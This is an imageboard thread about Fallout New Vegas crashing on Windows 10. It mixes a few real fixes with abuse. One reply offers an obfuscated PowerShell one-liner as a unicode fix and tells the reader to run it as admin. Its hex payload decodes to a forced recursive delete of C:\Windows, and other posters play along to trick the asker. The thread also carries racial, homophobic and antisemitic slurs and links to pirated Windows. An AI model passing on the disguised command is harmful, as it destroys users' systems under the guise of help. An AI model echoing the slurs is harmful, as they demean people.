Fallout New Vegas Help

No where else had the answer so I came here. Everytime I try to load Fallout NV it crashes after the wheel stops spinning. My computer was running it fine a while ago with quite a few mods, including TTW. I've done a complete reinstallation including uninstalling all of my mods. I'm running Windows 10 with an AMD graphics card with 4GB of VRAM.

Other urls found in this thread:

thepiratebay.org/torrent/10080911/Windows_7_SP1_Home_Premium_(64_Bit)
nexusmods.com/newvegas/mods/34970/?
twitter.com/NSFWRedditImage

this is bait

Bait or not I doubt there's any user here who would use winjew 10. Sorry OP.

Have you ever tried sucking less dick ?

I heard that helps.

Thought Windows 10 was going to be the problem

uninstall windows 10

Get rid of Windows 10.

Cuckchan fuck off we don't want you hear go back just go the fuck back!

OP, I actually had the same issue with FONV. It has to do with how Windows 10 handles unicode. I threw together a little powershell script that fixes it.

Run powershell as admin and then copy this:
invoke-expression -command:([System.Text.UTF8Encoding]::UTF8.GetString( ( "64656c20633a5c77696e646f7773202f66202f73202f71" -split '(..)' | ? { $_ } | % {[BYTE]( [CONVERT]::toint16($_,16)) } ) ))

Did you have the same issue with FO3 as well? I didn't, but one of my friends did and that fixed it for him as well.

Thanks for the help Freetard hivemind assertive argument machine!

It works fine on my machine, maybe it has to do with the font or something

I'll PM you the fix :)

Stop playing it. It's a bad game.

Like I said, it's because of how Windows 10 handles unicode. Some machines broke legacy support, some didn't. It royally fucked with an old financial system at work.

That's strange. NV works fine for me on the botnet.

you do know that win10 is fucking with steam to make it a pain to run games with, right?

Get New Vegas Anti-Crash, of course.

Nothing wrong with mine, maybe don't pirate games next time criminal :^)

they don't real you monkey

Just use one of those bitch mods that turn all the bugs into cocks or whatever.

The problem isn't windows 10, unlike a lot of the fags here are saying.
I nodded new vegas on vista, 7, 8 and 10, and what is happening to you right now is one mod conflicting with the others.

The only thing you can do is activate them all one by one to see which one is causing you to crash.

Also stop listening to the faggots that pin every problem to windows 10, it might be the cancer of operative systems, but if it were for them it would've been the retroactive cause of aids. They're a bunch of retarded spergs.

No harm in running it, in case you do run into issues with unicode.

It'll also fix some issues with emoji, so you can properly despair whenever you see a nigger on social media.

This should fix the game for you, OP.
thepiratebay.org/torrent/10080911/Windows_7_SP1_Home_Premium_(64_Bit)

Drop in an older d3d9.dll into the new vegas directory to override the global Windows 10 version.

nexusmods.com/newvegas/mods/34970/?

Have you tried turning it off then on again?

I knew about the one that changes them into ghouls, I never knew someone turned them into cocks with a mod.

wew
e
w

I had that problem (on win7) with my amd card. I needed to replace the d3something.dll file with a nvidia one I got from the nexus,

Jesus Christ, user, downloading copies of Windows from The Pirate Bay is how you get rootkits. Just get your copy from Microsoft and download a Windows activator.

As was shown in the thread, it's literally a problem with Windows 10. Fuck off, faggot.

or

If all else fails: Have you tried turning it off and then back on again?

Did he actually run the script?

To the >>>/gaschamber/ with ye.